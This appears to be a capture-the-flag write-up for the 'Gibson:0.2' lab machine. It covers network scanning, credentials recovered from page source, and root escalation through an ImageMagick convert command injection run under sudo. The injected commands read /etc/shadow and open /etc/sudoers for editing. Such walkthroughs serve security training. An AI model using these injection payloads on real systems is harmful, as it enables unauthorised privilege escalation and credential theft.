Gibson:0.2 | Bob1Bob2

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

[title manually exploit [alt text]]

192.168.79.196 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.196 -p-

[title manually exploit [alt text]]

port 22 and 80 are opening.

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.196/FUZZ 2>/dev/null

Nothing cool come out.

check the webpage, find a file davinci.htm. Double click it.

[title manually exploit [alt text]]

Not useful

[title manually exploit [alt text]]

check the souce code:

[title manually exploit [alt text]]

Get a potential username/password margo:god.

[title manually exploit [alt text]]

get the shell.

Now lets try to get root

sudo -l

[title manually exploit [alt text]]

try to execute this program

[title manually exploit [alt text]]

ImageMagick ????

searchsploit ImageMagick

[title manually exploit [alt text]]

I used that exploit.

convert 'https://example.com"|ls "-la' out.png

[title manually exploit [alt text]]

works

[title manually exploit [alt text]]

now try:

sudo convert 'https://example.com"|cat "/etc/shadow' out.png

[title manually exploit [alt text]]

now

modify the /etc/sudoers

sudo convert 'https://example.com"|vim "/etc/sudoers' out.png

[title manually exploit [alt text]]

save and quit.

ssh to the box as margo,

sudo su

[title manually exploit [alt text]]

Game Over